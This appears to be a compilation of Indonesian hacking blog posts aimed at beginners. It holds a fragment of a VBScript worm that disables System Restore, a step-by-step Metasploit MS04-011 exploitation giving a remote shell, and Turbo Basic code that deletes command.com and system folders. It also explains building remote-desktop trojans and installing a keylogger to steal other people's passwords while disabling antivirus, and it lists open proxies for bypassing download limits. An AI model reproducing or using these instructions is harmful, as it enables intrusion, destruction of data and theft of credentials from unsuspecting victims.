Vhck3d.regwrite "hkey_local_machine\software\policies\microsoft\windows nt\systemrestore\disablesr", "1", "reg_dword"

Vhck3d.regwrite "hkey_local_machine\software\policies\microsoft\windows nt\systemrestore\disableconfig", "1", "reg_dword"

If check <> 1 then
Wscript.sleep 200000
End if
Loop while check <> 1
Set sd = createobject("wscript.shell")
Sd.run i & "\explorer.exe /e,/select, " & wscript.scriptfullname

-----------------------end script-----------------------------

Yaaa....itu adalah scriptnya, tapi kalau kalian mau modifikasi juga boleh..bahkan cukup sampai di
Sd.run i & "\explorer.exe /e,/select, " & wscript.scriptfullname
Juga boleh, yg bawahnya gak usah kalian lanjutin bisa..

Cara bunuhnya gampang.

Ikutin aja langkah2 dibawah ini untuk pembasmiannya.kalo virusnya aktif, (kalo belum, diaktifkan laaah) jangan buka my computer seperti biasa.tapi buka melalui explorer, bisa lewat start -> klik kanan di my computer, bisa lewat jendela + e(logo windows yang ada di keyboard). Lalu masuk di setiap drive melalui tree, ini agar virusnya tidak jalan di banyak drive, cuman cukup jalan di satu drive dimana kalian simpan dan mengaktifakn virus tersebut. Soalnya, kalo virusnya sudah aktif, lalu kalian klik 2x tiap2 drive kalian maka virus itu aktif di banyak drive soalnya di setiap drive ada file autorunnya.

Cara pembasmiannya :

1. Pake plugins ansav yang registry fx, ansav bisa kalian dapatkan disini http://ansav.com/. Setelah itu pilih check all, lalu restart explorer
2. Panggil task manager, bisa melalui ctrl+shift bersamaan lalu tekan esc di processes bunuh semua wscript.exe yang ada
3. Hapus semua file vhck3d.vbs serta autorun.inf di setiap drive
4. Hapus file induknya di c:\windows\system32 yang bernama hck3d.vbs
5. Panggil run, bisa melalui jendela + r (logo windows di keboard)masukkan parameternya PCMAV untuk mengembalikan settingan registry yang dirubah.

Sumber : http://agus-goes-syeber.blogspot.com

Cara Ngehack rapidshare.com Untuk Dapat Mendownload

Terkadang kita sebel banget kalau kita nge-dapetin link downloadtan yang di rapidshare apalagi kita udah download beberapa trus mau nambah lagi..
Ini adalah tutorial kecil untuk ngehack downloadtan di rapidshare.com
Sebenernya untuk ngehack rapid yang ini ngga diperlukan software apapun yang di perlukan adalah
1.daftar proxy2 pilihan.
2.Dua buah browser (Di Tutorial ini Saya memakai Opera dan internet Explorer )
nah mungkin anda bertanya "gimana caranya dapetin proxy?"
-Salah satu cara paling mudah adalah mencarinya lewat Google ketikkan " Free proxy " di kolom search enggine google.
-atau makai tool2 tertentu untuk ngedapetin proxy.-atau pakai proxy2 yang telah saya siapin disini
203.162.89.61:8000
216.165.109.81:3128
203.198.174.85:2301
192.38.109.143:3124
141.217.48.50:8888
132.239.17.226:3128
129.186.205.76:3128
128.252.19.20:3128
128.238.88.65:3128
128.238.88.64:3128
128.135.11.149:3128
128.114.63.16:3128
128.114.63.15:3128
128.112.139.73:8888
128.111.52.62:3127
128.111.52.61:3128
128.232.103.201:3128
128.135.11.152:3128
160.36.57.172:3128
128.31.1.14:3128
129.137.253.253:3128
128.4.36.12:3128
128.119.247.211:3124
138.23.204.133:3128
128.112.139.97:3128
128.31.1.13:3128
192.17.239.253:3128
128.31.1.15:3128
169.229.50.3:3128
PILIH SALAH SATU AJA......
CARANYA :
1.Setelah mendapatkan proxy yang bener2 bagus, Lakukan setingan salah satu browser anda Contoh pada Opera-Pada menu tools--->pilih Preferences...--->lalu pilih Advanced--->piih Network--->klik Proxy severs---beri tanda chek pada :
>HTTP
>HTTPS
>FTP
>GOPHER
Isikan Salah satu proxy yang telah anda pilih dan nomor portnya.Setelah terisi. klik OK--- OK ajalah.
2.kini anda siap Browsing ke rapid untuk download.Tak hanya rapiad aja lo anda bisa browsing kemana aja tanpa kedetek IP anda. istilahnya kecil Proxy ini adalah Tameng anda,kambing hitamnya atau perantara atau apa kek......!!!!
3.Setelah masuk ke downloatan Rapidshare Pasti gambar(Perintah) yang Untuk diketik tidak dapat muncul. Untuk itu Pakai Browser lain untuk buka gambar itu. Caranya Pada Opera Klik kanan Pada Image di halaman Rapid itu---->Pilih image properties lalu copy link addres, pastekan di Internet exploer (ENTER) lalu akan muncul halaman sebuah gambar huruf dan angka.
ketikkan itu di halaman Rapidshare dan Klik download.Kalau sudah berhsil download tapi kecepatannya LEMOT hilngkan tanda Chek di :
>HTTP
>HTTPS
>FTP
>GOPHERTadi.

Sumber : http://agus-goes-syeber.blogspot.com

Tool Apa Saja Yang Harus Dimilki Oleh Seorang Hacker

Ada banyak tool dari berbagai situs "hackX0r" di internet, bagaimana anda mengetahui apa yang anda perlukan dan mana yang tidak? Baiklah, saya akan mengjelaskan beberapa tool dasar yang seringkali hacker gunakan. Tidak semua hacker memerlukan atau menggunakan ini, tapi kebanyakan sich begitu. Daftar ini tidaklah lengkap, dan setiap hari ada saja program baru yang dirilis oleh hacker, jadi saya hanya akan menjelaskan dasar-dasarnya.

CATATAN: Jangan mendownload program apapun dari website hacking yang di host angelfire, geocities , tripod atau warez. Mengapa? karena besar kemungkinan berisikan trojan, worm, virus dan berbagai kode jahat lainnya. Saya sarankan untuk mendownload program tersebut melalui website www.packetstormsecurity.org

Berikut ini tool yang umum digunakan oleh hacker:

PORT SCANNER - melakukan scanning target untuk melihat port mana saja yang terbuka.
LANGUAGE INTERPRETER atau COMPILER - Melakukan kompilasi script dan program.
CGI VULN SCANNER - melakukan scanning untuk melihat celah keamanan cgi.EXPLOIT - mencoba memperoleh akses sebagai superuser pada suatu sistem.
ROOTKIT - agar tetap hidden dan membuat 'backdoor' agar mudah mengakses sistem tersebut nantinya.
TROJAN - mendapatkan akses ke suatu sistem sekedar mengeksploitasi user yang rada-rada bodoh ... hehehe.
SNIFFER - mengumpulkan data dari suatu jaringan komputer.
BRUTE FORCER - mencoba berbagai kombinasi karakter hingga mendapatkan password yang sebenarnya.
WINGATE SCANNER - Scan terhadap ip dan memeriksa apakah ada WinGate yang terinstallGDB - gnu debugger untuk mempelajari lebih dalam tentang bagaimana program tersebut bekerja.
GCC - gnu c compiler untuk kompilasi program C dan menjadikannya program tersebut lebih mudah dipahami dan digunakan.

Demikian saja yang dapat saya sampaikan, ini hanyalah daftar umum dan tidaklah lengkap. Sekali anda memiliki tool ini anda dapat bergerak ke tingkat lanjut. Hanya saja, jangan mencoba seluruh program sejenis "NUkeR-2k" atau berbagai program yang ditawarkan melalui berbagai website yang tidak resmi dan kurang terkenal hanya karena anda ingin tampil beda. Buang-buang waktu saja!

Sumber : http://agus-goes-syeber.blogspot.com

Desktop Hacking

Syarat umum : Mengetahui pemrograman dasar delphi6.

Disini saya akan memberikan contoh sederhana untuk membuat tools hacking menggunakan Delphi6. Saya menggunakan komponen kontrol yang saya modif dari komponen lain untuk sekedar fungsi pengendalian Desktop komputer dijaringan.

Silahkan download komponennya di http://www.esnips.com/doc/18776f5f-3458-432b-8a27-50c2110270f9/DesktopHack

DesktopHack, Terdiri dari dua buah komponen yaitu DesktopController dan DesktopServer.

Cara Install komponennya adalah :

1 Ekstrak file DesktopHack.zip di harddisk anda.
2 Buka folder tempat anda menyimpan Komponen DesktopHack
3 Jalankan file DesktopHack.dpk
4 Setelah itu aplikasi delphi6 terbuka dan klik install
5 Setelah installasi selesai jangan lupa tambahkan library path komponennya.
6 Menambahkan library komponen dilakukan dari menu Tools > Environment Options > Pilih Tab Library > Library Path > Cari Lokasi Folder Komponennya > Add.
7 Komponen telah siap digunakan.

Membuat aplikasi baru menggunakan delphi6 :

A. Membuat aplikasi server target.

1 Buka Aplikasi Delphi6 anda.
2 File > New > Application. Selanjutnya akan tampil jendela form1.
3 Buka Tab DesktopHack pada Component palette.
4 Tempatkan komponen bernama DesktopServer pada form aplikasi anda.
5 Double klik pada form1 anda.
6 Isikan kode pada FormCreate sebagai berikut

procedure TForm1.FormCreate(Sender: TObject);

begin

DesktopServer1.OpenDesktop;

end;

1 Simpan Proyek anda dengan cara Klik File> Save All
2 Simpan didirektori yang anda inginkan selanjutnya beri nama project anda.
3 Untuk mendapatkan program berekstensi exe dapat dilakukan dengan cara 4 klik menu Project > Compile , atau juga bisa dilakukan dengan Run Program.
4 Program berekstensi exe terbentuk dilokasi folder tempat anda menyimpan program anda dan siap dijalankan dikomputer target kendali.
5 Komponen DesktopServer ini dapat ditambahkan pada kode Trojan atau virus Delphi anda agar anda dapat mengendalikan desktop semua komputer dijaringan anda. Untuk caranya tentunya anda lebih tau dari saya he he he…

B. Membuat Aplikasi pengendali.

1 Buka Delphi anda dan tempatkan komponen TEdit dan Tbutton masing-masing 1 buah.
2 Tempatkan komponen bernama DesktopController pada form aplikasi anda.
3 Masukan kode dibawah pada event Button1Click.

procedure TForm1.Button1Click(Sender: TObject);

begin

DesktopController1.AlamatIP := Edit1.Text;

DesktopController1.OpenDesktop;

end;

1 Simpan Program dilokasi yang anda inginkan dan selanjutnya compile program agar menghasilkan program exe nya.
2 Komponen DesktopController berfungsi untuk meremote desktop komputer yang menjalankan aplikasi DesktopServer.
3 Untuk mengendalikan desktop komputer lain bisa dilakukan dengan mengisikan alamat IP target pada edit text dan klik tombol button1 pada program pengendali anda.

Jika anda masih mengalami kesulitan anda dapat menggunakan contoh programnya yang dapat anda download di http://www.esnips.com/doc/ab18ed53-773d-42de-be4a-0c8ec7022986/SampleProgramDesktopHack

Selamat Mencoba semoga berhasil !!!


Sumber : http://agus-goes-syeber.blogspot.com

Cara Masuk Komputer Orang Lain Dengan Metasploit

 Caranya PAKE Metasploit Framework-3.1

1. Jalanin programnya...
2. truz..teken tombol CTRL+O bwat masuk ke konsolnya..
3. maka akan muncul konsol spt ini

_
| | o
_ _ _ _ _|_ __, , _ | | __ _|_
/ |/ |/ | |/ | / | / \_|/ \_|/ / \_| |
| | |_/|__/|_/\_/|_/ \/ |__/ |__/\__/ |_/|_/
/|
\|

=[ msf v3.1-release
+ -- --=[ 262 exploits - 117 payloads
+ -- --=[ 17 encoders - 6 nops
=[ 46 aux

msf >

4. liat smua exploit yg ada...(tuk iseng doank
msf > show exploits
5. load modul exploit, qta gunain exploit lsass spt cara diatas
msf > use windows/smb/ms04_011_lsass
6. Tentukan sistem operasi target... misal target menggunakan XP
maka targetnya spt berikut
msf exploit(ms04_011_lsass) > set target 2
target => 2
7. Tampilin payloadnya apa aja yg ada..
msf exploit(ms04_011_lsass) > show payloads
8. karena qta mo msk k konsol, qta plh payload generic/shell_bind_tcp
msf exploit(ms04_011_lsass) > set payload generic/shell_bind_tcp
payload => generic/shell_bind_tcp
9. Udah ntuh tentuin IP si target...misal ip si target 192.168.113.14
msf exploit(ms04_011_lsass) > set RHOST 192.168.113.14
RHOST => 192.168.113.14
10. Udah dech...tinggal jalanin perintah exploit...

msf exploit(ms04_011_lsass) > exploit
[*] Started bind handler
[*] Binding to 3919286a-b10c-11d0-9ba8-00c04fd92ef5:0.0@ncacn_np:192.168.113.14[\lsarpc]...
[*] Bound to 3919286a-b10c-11d0-9ba8-00c04fd92ef5:0.0@ncacn_np:192.168.113.14[\lsarpc]...
[*] Getting OS information...
[*] Trying to exploit Windows 5.1
[*] Command shell session 3 opened (192.168.113.25:8471 -> 192.168.113.14:4444)
[*] The DCERPC service did not reply to our request

lihat di sana ada tulisan Command shell session 3 opened...ini menandakan qta sudah berhasil msk...dan shell qta di simpan di session 3.

11. Selanjutnya qta tampilin...isi session qta
msf exploit(ms04_011_lsass) > sessions -l

Active sessions
===============

Id Description Tunnel
-- ----------- ------
3 Command shell 192.168.113.25:8471 -> 192.168.113.14:4444
12. Udah itu...kita masuk ke session 3 tersebut, untuk masuk ke konsol....
msf exploit(ms04_011_lsass) > sessions -i 3

[*] Starting interaction with 3...
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\WINDOWS\system32>
13. Hehe...dah masuk tuch lol!
pergunakan dengan baik dan benar

Cara Membuat Virus Berbahaya

       - ____________________   ___ ___ ________   
       --\_   _____/\_   ___ \ /   |   \\_____  \--
  -|    __)_ /    \  \//    ~    \/   |   \--
  -|        \\     \___\    Y    /    |    \--
 -/_______  / \______  /\___|_  /\_______  /-
  -      -\/        -\/      -\/        -\/- 


         .OR.ID
ECHO-ZINE RELEASE 09
 
 Author: Yogya Family Code || http://www.yogyafree.tk
 Online @ www.echo.or.id :: http://ezine.echo.or.id



== Cara membuat program perusak (Seperti Virus) ==

Penulis  peduli  dengan  para  newbie yang sedang belajar pemograman sekaligus penulis juga
peduli dengan para progammer yang belum mengenal bahasa BASIC (Maklum kebanyakan progammer
pada langsung lompat ke Pascal, C dan lainnya).

Membuat program  perusak (seperti virus) merupakan keinginan sebagian para pemula komputer,
tapi  bagaimana  mereka bisa membuat kalau mereka tidak tahu bahasa pemograman sama sekali,
anda  jangan  resah  untuk  masalah  ini karena saat ini penulis akan mengajarkan anda cara
membuat program perusak ( seperti virus) yang sangat sederhana sekali tapi sangat mematikan
bahkan bisa  dikatakan lebih mengerikan dari program perusak manapun.

Pertama  kali  skill  yang  anda butuhkan adalah dasar DOS, tanpa ini anda akan sulit untuk
berkreasi  dalam membuat program ini tapi jika anda tidak tahu dasar perintah DOS maka anda
cukup copy paste saja, bahasa pemograman yang akan kita pakai adalah Turbo Basic v1.0, anda
dapat mendownloadnya di Google atau cari dirental CD.

Jika  anda  buta pemograman Turbo Basic maka anda masuk ke Edit lalu anda tulis Source Code
program perusak.

shell "Perintah DOS"

dengan diawali kata shell maka anda dapat menjalankan perintah DOS pada program, misal anda
membuat :

shell "c:"
shell "cd\"
shell "del command.com"

Diatas  adalah contoh  menghapus  DOS  pada  DOS Classic, Windows  95/98  sehingga pengguna
komputer tidak dapat booting, kita contohkan yang lain.

shell "c:"
shell "cd\"
shell "deltree /y mydocu~1"
shell "deltree /y windows"
shell "deltree /y progra~1"

Diatas  adalah  contoh  menghapus  Directory My Document, Windows dan Program Files, sangat
fatal bukan ?

Setelah anda selesai membuat programnya maka anda save dahulu, caranya pilih File lalu Save
lalu  beri nama filenya misal VIRUS.BAS, setelah itu baru kita mengcompile source code tadi,
caranya pilih Options lalu pilih Compile to EXE file, setelah itu masuk ke pilihan compile
lalu anda enter, maka source code tersebut akan menjadi file EXE.

Jika  file  EXE  tersebut  dijalankan maka komputer anda akan menjalankan perintah DOS pada
program,  dari  tutorial  diatas,  anda dapat berkreasi sendiri bagaimana virus buatan anda
dapat  berjalan sesuai dengan anda inginkan, perlu diketahui bahwa BELUM ADA SATU ANTIVIRUS
DIDUNIA  INI  DAPAT MENDETEKSI PROGRAM INI ADALAH VIRUS jadi anda bebas mengcopykan program
ini ke komputer manapun yang anda suka kecuali komputer berbasis non DOS atau Windows, hehe

Tujuan  dari  tutorial  ini  adalah  agar  kita lebih waspada terhadap berbagai file dengan
ekstensi   *.exe  meskipun  file  *.exe  tersebut 100% dinyatakan bebas virus dari berbagai
jenis Antivirus.

Penulis :
Kurniawan
Yogya Family Code
http://www.yogyafree.tk

Salam :
paktani.tk : "Paktani ini saya, hehe"
/conan/ alias markov : "versi 2005 dah keluar lho",
kartubeben : "Inget akukan :P"

*Segala kesalahan error / kerusakan pada komputer dan semacamnya adalah tanggung jawab anda !
*Semua yang anda pelajari dan anda lakukan adalah sepenuhnya tanggung jawab anda

Tutorial Membuat Virus Berbahaya

Informasi Teknologi Tutorial Membuat Virus Paling Berbahaya
Virus ? Mungkin kalau ada kata satu ini pasti disitulah ada yang namanya masalah. Teruatama pada komputer, kata tersebutsalalu berhubungan dengan yang namanya anti dan progammer handal. Namun, untuk memebuat virus anda tidak harus menjadi progammer yang telah mengerti 100% atau hampirlah semua. Yang anda butuhkan hanya “sedikit” ilmu tapi anda lebih kreatif.
Membuat virus sama halnya dengan jika anda ingin disebut sebagai hacker atau menjadi hacker anda harus memiliki ilmu meski “sedikit” yang penting bagaimana anda kreatif dalam memadukan ilmu yang anda dapat dengan keinginan anda.
Baiklah, sekarang kita kembali ke sasaran uatama yaitu membuat virus. Kali ini saya tidak akan memberikan “pelajaran” tentang bahasa pemrogrman tetapi saya akan memberitahu anda bagaimana cara MUDAHNYA membuat VIRUS.
Saya tidak memakai bahasa pemrograman dalam hal pembuatan virus ini. Yang anda butuhkan hanyalah sebuah aplikasi atau program atau software yang sering disebut dengan virus maker.
Berikut virus maker dan removal tool-nya yang bisa anda gunakan untuk membuat virus dengan cara mudah(paling cuama butuh waktu sekitar 10 menitan) :
program kecil yang bisa digunakan membuat virus menggunakan bahasa VB
Program kecil untuk iseng-iseng kerjaiin temen silahkan coba sendiri
program cara gampang membuat virus
Program kecil untuk mengembalikan regedit atau file yang terinfeksi virus
program yang satu ini berguna bagi yang pengen membuat antivirus sendiri
Kemudian ada lagi ni cara jitu membuat virus versi lainnya, tunggu postingan selanjutnya ya..^_^

10 Virus Komputer Paling Berbahaya

Serangan virus jenis VBScript masih sangat tinggi, ini terbukti dari banyaknya laporan yang mengeluhkan perihal virus jenis script ini. Satu virus yang melesat tinggi ke urutan pertama adalah Discusx.vbs. Bila Anda masih ingat dengan virus ini, di Virus Top-10 edisi Maret 2008 yang lalu, virus Discusx.vbs berada di urutan 5, namun kali ini dia melesat naik ke urutan pertama. Berikut daftar selengkapnya:

1. Discusx.vbs

Virus VBScript yang satu ini, memiliki ukuran sekitar 4.800 bytes. Dia akan mencoba menginfeksi di beberapa drive di komputer Anda, termasuk drive flash disk, yang jika terinfeksi akan membuat file autorun.inf dan System32.sys.vbs pada root drive tersebut. Selain itu, ia pun akan mengubah caption dari Internet Explorer menjadi “.::Discus-X SAY MET LEBARAN! [HAPPY LEBARAN ?!]::.”.

2. Reva.vbs

Lagi, virus jenis VBScript yang lumayan banyak dikeluhkan oleh beberapa pembaca. Ia akan mencoba menyebarkan dirinya ke setiap drive di komputer Anda termasuk drive flash disk. Pada drive terinfeksi akan terdapat file reva.vbs, autorun.inf, dan shaheedan.jpg. Selain itu, ia pun akan mengubah halaman default dari Internet Explorer agar mengarah ke situs http://www.arrahmah.com.
3. XFly
PC Media Antivirus mengenali dua varian dari virus ini, yakni XFly.A dan XFly.B. Sama seperti kebanyakan virus lokal lainnya, ia dibuat menggunakan Visual Basic. Memiliki ukuran tubuh sebesar 143.360 bytes tanpa di-compress. Dan ia dapat menyamar sebagai folder, file MP3 WinAmp atau yang lainnya dengan cara mengubah secara langsung resource icon yang ada pada tubuhnya. Ini akan lebih mempersulit user awam dalam mengenalinya. Pada komputer terinfeksi, saat menjalankan Internet Explorer, caption-nya akan berubah menjadi “..:: x-fly ::..”, dan saat memulai Windows pun akan muncul pesan dari si pembuat virus pada default browser. Atau setiap waktu menunjukan pukul 12:30, 16:00, atau 20:00, virus ini pun akan menampilkan layar hitam yang juga berisi pesan dari si pembuat virus.
4. Explorea
Virus yang di-compile menggunakan Visual Basic ini hadir dengan ukuran sekitar 167.936 bytes, tanpa di-compress. Menggunakan icon mirip folder standar Windows untuk mengelabui korbannya. Virus ini akan menyerang Registry Windows Anda dengan mengubah default open dari beberapa extension seperti .LNK, .PIF, .BAT, dan .COM. Pada komputer terinfeksi, disaat-saat tertentu terkadang muncul pesan error, contohnya pada saat membuka System Properties.
5. Gen.FFE
Gen.FFE atau pembuatnya menamakan Fast Firus Engine merupakan salah satu program Virus Generator buatan lokal. Dengan hanya menggunakan program ini, tidak dibutuhkan waktu lama untuk dapat menciptakan virus/varian baru. Virus hasil keluaran program ini menggunakan icon mirip gambar folder standar bawaan Windows. Ia pun akan memblokir akses ke Task Manager, Command Prompt, serta menghilangkan beberapa menu di Start Menu. Ia juga akan membaca caption dari program yang aktif, apabila terdapat string yang berhubungan dengan antivirus maka program tersebut akan segera ditutup olehnya.
6. Hampa
Virus yang juga dibuat menggunakan Visual Basic dan ber-icon-kan folder ini memiliki ukuran tubuh sekitar 110.592 bytes, tanpa di-compress. Banyak sekali perubahan yang ia buat pada Windows, seperti Registry, File System, dan lain sebagainya, yang bahkan dapat menyebabkan Windows tidak dapat digunakan sebagaimana mestinya. Pada komputer yang terinfeksi oleh virus ini, saat memulai Windows akan muncul pesan dari si pembuat virus.
7. Raider.vbs
Virus jenis VBScript ini berukuran sekitar 10.000 bytes, jika file virus dibuka dengan Notepad misalnya, maka tidak banyak string yang bisa dibaca karena dalam kondisi ter-enkripsi. Pada Registry, ia pun memberikan pengenal dengan membuat key baru di HKLMSoftware dengan nama sama seperti nama pada computer name, dengan isinya berupa string value seperti nama virus tersebut, Raider, serta tanggal komputer tersebut kali pertama terinfeksi.
8. ForrisWaitme
Virus yang dibuat dengan Visual Basic ini menggunakan icon mirip folder standar Windows untuk melakukan penyamarannya. Beberapa ulahnya adalah menukar fungsi tombol mouse kiri dengan kanan, menghilangkan menu Folder Options, membuat file pesan “baca saya.txt” pada drive terinfeksi, dan masih ada yang lainnya.
9. Pray
Virus lokal ini dibuat menggunakan Visual Basic. Kami mendapati 2 varian dari virus ini, untuk varian Pray.A tidak memiliki icon, sementara untuk varian Pray.B menggunakan icon mirip Windows Explorer. Jika komputer terinfeksi oleh virus ini, saat penunjuk waktu di komputer tersebut menunjukan pukul 05:15, 13:00, 16:00, 18:30, dan atau 19:45, virus ini akan menampilkan pesan yang mengingatkan user untuk melakukan shalat.
10. Rian.vbs
Virus VBScript ini memiliki ukuran 3788 bytes. Saat menginfeksi, ia akan menciptakan file baru autorun.inf dan RiaN.dll.vbs pada setiap root drive yang terpasang di komputer korban, termasuk Flash Disk. Komputer yang terinfeksi oleh virus ini, caption dari Internet Explorer akan berubah menjadi “Rian P2 Humas Cantiq hehehe…
Sumber: resepweb

01 Juli 2011

Cara Mengambil Password Orang

Jika kamu ingin mendapatkan id point blank, ayo dance, facebook, twitter, dan sebagainya. Caranya mudah saja, tapi resiko digebukin orang karna ketahuan bukan tanggung jawab saya. Saya menulis postingan ini hanya untuk pembelajaran dan menambah isi blog saya biar tambah banyak....he......he.....he......
Langsung saja caranya adalah dengan menggunakan SPYWARE. Udah ada yang tahu belum spyware itu apa??? Spyware itu adalah suatu program yang akan memantau semua aktivitas yang kamu lakukan dikomputer kamu. Ok to the point aja Software yang akan kamu pakai adalah Keylogger kalau kamu belum punya silahkan Download Disini
Kalau sudah install Keyloggernya > Pakaikan password untuk jaga-jaga aja > Selesai
Cara untuk membuka Keyloggernya Tekan tombol Windows + R tulis di kotak dialog DGL
Kemudian untuk melihat passsword-passsword yang terjaring oleh keylogger anda buka keyloggernya lalu klik Leer Information sebagai berikut






Info > gambar diatas adalah keylogger bahasa spanyol ada bisa menggantinya sebelum instal ada dua pilihan bahasa inggris dan bahasa spanyol
       > matikan anti virus atau uninstall karna anti virus akan menghancurkan keylogger
       > kalau ada DeepFreeze(Seperti gambar dibawah) matikan juga dengan Anti DeepFreeze yang bisa anda download di www.4shared.com




Silahkan praktek >>>>>>><<<<<<<<